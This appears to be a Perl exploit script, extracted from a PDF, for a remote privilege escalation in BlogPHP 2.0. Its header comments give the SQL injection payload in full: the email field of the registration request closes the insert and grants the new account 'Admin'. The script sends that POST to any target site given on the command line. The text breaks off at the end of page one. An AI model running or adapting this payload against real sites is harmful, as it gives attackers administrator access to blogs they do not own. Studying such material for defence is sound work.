BlogPHP 2.0 Remote Privilege Escalation Exploit.pdf

1 #!/usr/bin/perl 2 # BlogPHP 2.0 Remote Privilege Escalation Exploit 3 # Author : Cod3rZ 4 # Site : http://cod3rz.helloweb.eu 5 # Site : http://devilsnight.altervista.org 6 # Cuz We Back Rude This Time 7 # 8 # Privilege Escalation 9 # Send a request to http://127.0.0.1/BlogPHPv2/index.php?act=register2 with: 10 # username=[yourusername]&password=[yourpass]&email=[yourmail]’,’Admin’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’)/* 11 # 12 # There are other bugs, find them yourself 13 # 14 # Usage: perl bp.pl <site> <user> <pass> <mail> 15 16 system(’cls’); 17 #system(’clear’); 18 19 use LWP::UserAgent; 20 use HTTP::Request::Common; 21 22 $site = $ARGV[0]; 23 $user = $ARGV[1]; 24 $pass = $ARGV[2]; 25 $mail = $ARGV[3]; 26 27 print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n"; 28 print " BlogPHP 2.0 Remote Privilege Escalation Exploit \n"; 29 print " Powered by Cod3rZ \n"; 30 print " http://cod3rz.helloweb.eu \n"; 31 print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n"; 32 33 sub usage { 34 print " Usage: perl bp.pl <site> <user> <pass> <mail> \n"; 35 print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n"; 36 } 37 if(!$mail) { &usage; } 38 else { 39 if ($site !~ /http:\/\//) { $site = "http://".$site; } 40 41 print " Site: $site \n"; 42 print " User: $user \n"; 43 print " Pass: $pass \n"; 44 print " Mail: $mail \n"; 45 print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n"; 46 print " Please Wait \n"; 47 print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n"; 48 49 $ua = LWP::UserAgent−>new; 50 $lwp = $ua−>request(POST $site.’index.php?act=register2’, 51 [ username => $user, password => $pass, email => $mail."’,’Admin’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’)/*" ]); 52 Page 1/2 BlogPHP 2.0 Remote Privilege Escalation Exploit Cod3rZ 06/23/